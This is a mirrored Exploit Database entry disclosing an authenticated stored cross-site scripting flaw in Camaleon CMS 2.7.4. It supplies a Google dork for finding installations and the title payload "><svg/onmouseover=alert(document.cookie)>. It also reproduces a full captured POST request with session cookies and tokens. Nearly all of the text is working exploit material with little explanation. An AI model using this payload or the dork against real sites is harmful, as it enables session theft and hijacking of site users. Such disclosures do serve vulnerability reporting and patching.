Cameleon CMS 2.7.4 – Persistent Stored XSS in Post Title

• Exploit Database
• 18 阅读

• 作者： Yasin Gergin
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • ruby
• 来源：https://www.exploit-db.com/exploits/51446/

• # Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
  # Google Dork: intext:"Camaleon CMS is a free and open-source tool and
  a fexible content management system (CMS) based on Ruby on Rails"
  # Date: 2023-10-05
  # Exploit Author: Yasin Gergin
  # Vendor Homepage: http://camaleon.tuzitio.com
  # Software Link: https://github.com/owen2345/camaleon-cms
  # Version: 2.7.4
  # Tested on: Linux kali 6.1.0-kali7-amd64
  # CVE : -
  
  --- Description ---
  
  http://127.0.0.1:3000/admin/login - Login as a Admin
  
  Under Post tab click on "Create New"
  
  While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
  
  http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
  to this url
  
  -- POST DATA --
  
  POST /admin/post_type/2/posts HTTP/1.1
  
  Host: 127.0.0.1:3000
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
  Firefox/102.0
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 666
  Origin: http://127.0.0.1:3000
  Connection: keep-alive
  Cookie:
  _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
  auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
  phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  
  authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
  
  -- POST DATA --
  
  Then view the post you've created by clicking on "View Page" move your
  mouse cursor onto post title. XSS will popup.